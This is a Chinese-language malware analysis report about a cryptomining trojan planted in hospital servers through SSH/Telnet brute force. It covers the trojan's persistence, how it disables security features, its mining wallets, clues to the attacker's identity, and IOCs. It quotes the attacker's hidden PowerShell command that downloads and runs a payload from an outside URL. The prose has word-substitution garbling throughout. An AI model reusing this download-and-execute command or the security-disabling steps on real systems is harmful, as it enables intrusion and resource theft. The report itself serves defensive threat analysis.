快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

广东重庆多家三甲医院服务器遭暴力入侵,黑客赶走50余款挖矿木马独享挖矿资源

0×1 违景

腾讯御见威胁情报中心近期检测到广东、重庆多家三甲病院服务器被黑客入侵,攻击者暴力破解病院服务器的遥程登录服务,以后行使有道笔记的分享文件功能下载多种挖矿木马

攻击者将挖矿木马伪装成遥程协助工具Teamviewer运行,攻击者的挖矿木马会检测多达50个经常使用挖矿程序的进程,将这些程序结束进程后独占服务器资源挖矿。该挖矿木马还会通过修改注册表,损坏操作体系安全功能:禁用UAC(用户帐户控制)、禁用Windows Defender,关闭运行惊险程序时的关上正告等等。

已知样本阐发发现,黑客工具,攻击者使用的挖矿木马拥有多个矿池,开挖的山寨加密币包括:门罗币(XMR)、以太坊(ETH)、零币(ZEC)等等,从矿池信息看,目前攻击者已累积获利达40余万元人民币。

腾讯御见威胁情报中心已发现有关病毒作者的线索,这位挖矿木马的控制者使用同一个ID在各类黑客论坛、开发者论坛活跃时间长达十年以上。

据腾讯御见威胁情报中心统计阐发,我国医疗机构开放遥程登录服务(端口号:22)的比例高达50%,这象征着有一半的服务器可能遭受相同的攻击。

0×2 具体阐发

0×2.1 传播方式

1.png

木马攻击流程

22端口提供ssh地道连接服务;23端口首要用于Telnet(遥程登录)服务,是Internet上普遍采用的登录以及仿真程序,由于一些治理员的安全意识薄弱,配置暗码简单容易猜解,导致黑客能够通过暗码字典进行猜解爆破登录。

入侵成功后行使powershell下载挖矿木马母体s.exe,命令行:

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://t.cn/RdBAka2','C:\Users\Public\s.exe');[System.Diagnostics.Process]::Start('C:\Users\Public\s.exe')

hxxp://t.cn/RdBAka2是短链接,对应实际的地址为:

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/1B81E7513E0341ADAEC4F7184D56E22B/208 

然后行使网易有道云笔记的文件分享功能来进一步下载木马,可以看到该地址上存放了大批的木马。

2.png

0×2.2 母体s.exe

走访有道云笔记接口

hxxp://note.youdao.com/yws/public/note/c8c088c27a169f54ecc00864bff300fc?keyfrom=public

获取木马下载地址

hxxp://note.youdao.com/yws/public/resource/e5b312333e8618e25badf7863ac8de0f/xmlnote/B811A461208843FAB6762B99FEA4965A/172

3.png

下载挖矿木马svchost.exe

4.png

启动挖矿木马

5.png

0×2.3 挖矿木马

0×2.3.1 自维护

关闭UAC提示

6.png

修改治理员批准提示

7.png

去掉bat、exe、reg、vbs、chm等文件的关上时正告

8.png

禁用Windows Defender 

9.png

0×2.3.2 挖矿

木马采用开源挖矿程序xmrig编译,版本为2.6.0

10.png

从地址hxxp://s.logv586.cc/更新木马

11.png

更新的挖矿木马伪装成Teamviewer.exe程序的图标和文件名

12.png

并且将木马躲身在music等文档目录下

13.png

木马在挖矿前结束其他挖矿进程,争取中招机器上的的计算资源。结束挖矿进程列表以下。

EthDcrMiner64.exe、eth.exe、etp1.exe、NMiner.exe、ETHSC.exe、miner.exe、ethdcr.exe、ccminer.exe、NiceHashMinerLegacy.exe、ZecMiner64.exe、DaggerGpuMiner.exe、xmrig.exe、VaalEtp4.exe、zm.exe、ethminer.exe、ccminer-x64-75.exe、bfgminer.exe、ccminer-x64.exe、ethminer117.exe、cast_xmr-vega.exe、miner64.exe、enemy.exe、etherdisk-miner.exe、xmr-stak-amd.exe、NsGpuCNMiner.exe、xmrig-amd.exe、lolMiner-mnx.exe、ChinaMiner.exe、挖矿专家.exe、marsminer.exe、bminer.exe、excavator.exe、PhoenixMiner.exe、ethsafe.dat、MinerMaster.exe、ccminerAlexis78.exe、minerd.exe、长沙-矿工ETH-SC双挖.exe、长沙-矿工A卡V5.6.exe、长沙-矿工N卡ZECV1.032.1.6(N卡0.3.2b内核).exe、eth&etc挖矿.exe、中国掘金者.exe、NiceHashMiner.exe、Miner.exe、client.exe、AwesomeMiner.RemoteAgent.exe、11.6.exe、10.2eth&etc挖矿.exe、EthControl.exe、MaxBai挖矿伴侣(整合版).exe、富矿矿工.exe、Optiminer.exe

14.png

检测Taskmgr.exe,若存在该进程则休止挖矿。

15.png

0×2.3.3 收益

挖矿进程伪装成体系进程svchost的相似名svchsot

16.png

矿池:xmr.f2pool.com

钱包1:4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXp28UUYXayQHFUrjojugSByAyf2VHatc9gL72XXnP8gjwSQrhZMn

17.png

矿池:xmr.f2pool.com

钱包2:4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXp28UUYXayQHFUrjojugSByAyf2VHatc9gLDtn6LAmyhbCFFfuWB

18.png19.png

矿池:eth.f2pool.com

钱包3:0xd20685b3f6B641898cdfe7b02CBfa8Bd9D8Ec214

20.png21.png

矿池:zec.f2pool.com

钱包4:t1Rj1ZmR1x1tFm48fcQ9SLPgkiNBMJzZvFZ

22.png23.jpg

综合各个钱包信息累计挖矿已获得收益40余万元人民币。

24.png

0×3 黑客画像

0×3.1 钱包

在其中一个挖矿木马中发现一个donate钱包,该钱包在此木马挖矿运行时没有被使用。42jgiScVMgMGkYSCfCFngpZHmuuBBzQ58fSGTiY3zPe4KnsMMHbj6oXKoVFHqbrPYNa2mqq9uZsuecYcmeC8TP4m9YRY9sr

25.png

搜索这个钱包,发现在网上唯一记录是在百度贴吧中。有贴吧用户投诉某挖矿软件提供者LuckerBD(贴吧号)提供了带有后门的挖矿软件,而该“后门钱包”恰是木马代码中包含的donate钱包。

26.png

找到LuckerBD提供的挖矿程序下载地址下载得到门罗币挖矿程序

27.png

其挖矿设置文件congfig.json中包含该“后门钱包”,但在教程中有说明该钱包需要替代成本人的。

28.png

目前不能证实该贴吧用户LuckerBD(QQ:256*****)与此次挖矿攻击的直接关系,但不排除其提供相干程序和参与制造的可能。

0×3.2 论坛信息

在代码中发现了有关某论坛dult.cn的代码和url记录

29.png

还包括论坛相干人员QQ:2580*****、1224******

30-1.png

目前不能证实论坛和QQ对应人员参与了此次挖矿攻击,但不排除提供了相干程序或手艺支持的可能。

0×3.3 邮箱

在木马使用的另一个矿池帐号中发现了邮箱地址lb63*****@hotmail.com。该帐号在minergate网站注册落后行挖矿,而在该网站注册时需使用真实有用的邮箱地址,所以邮箱lb63*****@hotmail.com有多是木马作者的。

31.png

搜索发现该邮箱帐号对应的名称lb63*****在各类黑客、开发者论坛有大批记录,时间跨度从2008年到2018年。

30-2.png

lb63*****在漏洞银行的记录。

33.png

在cctry.com(VC驿站)发现lb63*****是河南用户

34.png

在bbs.125.la(精益论坛)发现lb63*****使用的QQ号1002*****

35-1.png

QQ1002*****信息地址也显示为河南。

36.png

0×4 关联阐发

跟踪阐发发现被入侵的设备IP网段比较集中,特别是113.*网段存在大批被入侵的机器, 例如被攻击的广州市某人民病院、广州市某大学附属病院、重庆某儿童病院、天津某大学等等,这些机构的设备都处于113.*网段,而这些机器上又都开放有22、23等端口。

因此推测黑客入侵通过批量扫描发现收集上存在易受攻击的机器,然落后行端口爆破入侵并植入了挖矿木马。目前发现该挖矿木马首要感染区域前三依次为江苏、上海、广东。

37.png

0×5 安全建议

1.加固服务器,修补服务器安全漏洞。使用安全的暗码策略,使用高强度暗码,切勿使用弱口令,防止黑客暴力破解。

2.要是不常使用可关闭22、23等易受攻击的端口。

3.使用腾讯御知收集空间危害雷达(网址:https://s.tencent.com/product/yuzhi/index.html)进行危害扫描以及站点监控

4.网站治理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该体系具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可周全维护网站体系安全。

5.检查进程中是否存在Teamviewer.exe,要是网管并未使用该遥程治理工具,而进程中存在,表示已经中招,企业用户推荐使用腾讯御点终端安全治理体系(https://s.tencent.com/product/yd/index.html)查杀。

0×6 IOCs

域名

s.logv586.cc

s.sock5.co

g.sock5.co

URL

hxxp://s.logv586.cc/1.txt

hxxp://s.logv586.cc/2.txt

hxxp://s.logv586.cc/update1.exe

hxxp://s.sock5.co:8089/eth/0508/kill.txt

hxxp://s.sock5.co:8087/eth/yx3/lin.asp?&a=csxf&ser=

hxxp://s.sock5.co:8089/eth/0508/name.txt

hxxp://s.sock5.co:8087/menluo/1.png

hxxp://s.sock5.co:8087/menluo/2.png

hxxp://note.youdao.com/yws/public/note/c8c088c27a169f54ecc00864bff300fc?keyfrom=public

hxxp://note.youdao.com/yws/public/note/6038b28fea954435260f1f49b8700fbd?keyfrom=public

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/1B81E7513E0341ADAEC4F7184D56E22B/208

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/123C970B749E41DABC4F49669EFCDDF4/105

hxxp://note.youdao.com/yws/public/resource/a365f4dc4f18be9fd6cfe8d3e657ac19/xmlnote/F1CCE56966A8481D98C87104B36D216A/165

hxxp://note.youdao.com/yws/public/resource/353fa4934376046777e3ba97ae1d530e/xmlnote/080B33DC6C124250A343E0ED57E96427/163

hxxp://note.youdao.com/yws/public/resource/c7003500e91d08b776585d7b57758607/xmlnote/17BA9DA052DC4CE48DEC28ED756775F9/168

hxxp://note.youdao.com/yws/public/resource/7ac6d30ee18a2f55405faa438035695a/xmlnote/A28B488699F448C9A9C9EB7343FA89AE/152

hxxp://note.youdao.com/yws/public/resource/4783e051988fb0eff8cf383200c536f1/xmlnote/A28B12E6FEE94255B0DA557BE74EE00D/155

hxxp://note.youdao.com/yws/public/resource/33dfd1aa0be86a4fe84be3843f47f1b5/xmlnote/4403BF98162E42748698AE379B5391FF/158

hxxp://note.youdao.com/yws/public/resource/e5b312333e8618e25badf7863ac8de0f/xmlnote/B811A461208843FAB6762B99FEA4965A/172

hxxp://note.youdao.com/yws/public/resource/c438575278e9960ccc2b1641b430be8e/xmlnote/1099078ED4224078ADACA3FBDF0DA2A9/176

矿池-钱包

xmr.f2pool.com

4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXp28UUYXayQHFUrjojugSByAyf2VHatc9gL72XXnP8gjwSQrhZMn

xmr.f2pool.com

4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXp28UUYXayQHFUrjojugSByAyf2VHatc9gLDtn6LAmyhbCFFfuWB

zec.f2pool.com t1Rj1ZmR1x1tFm48fcQ9SLPgkiNBMJzZvFZ

eth.f2pool.com 0xd20685b3f6B641898cdfe7b02CBfa8Bd9D8Ec214

Md5

f4bae88610da798f9e3669a9db002643

aea15475e5554ce412ae96e4a89565de

d255f8e52020606ce118d43503762ab4

413658168e476eb02373907954181f58

b1f1eef4f2e4a50428f426efb7c767ef

35154485d43d421be7b81d2100fb9e4a

cc2430273474cba1f6bdbff5f0319826

fe6c9b84934295ffa3903bbdf13de7d5

f806b54c1306c054a623188bc7523ad4

6cb9aa4e5cc730805deb4fd1a0038398

c09d0d4d2d0386c90f0dd1f994b246c5

f4b3e335011de366a01ce711b29c147d

6149e53a77f4b0af0bcd015c862f3748

a87a7d4cb1d709d8ac0fe7fb26603c96

11b16372746c70b8a16ea7527789483a

e036dbd652426927b31cd1c11692f9fb

354878bfaed1ff3ed393359653673a16

9281aafc34c6488d032cdce379a55cd7

*

您可能还会对下面的文章感兴趣: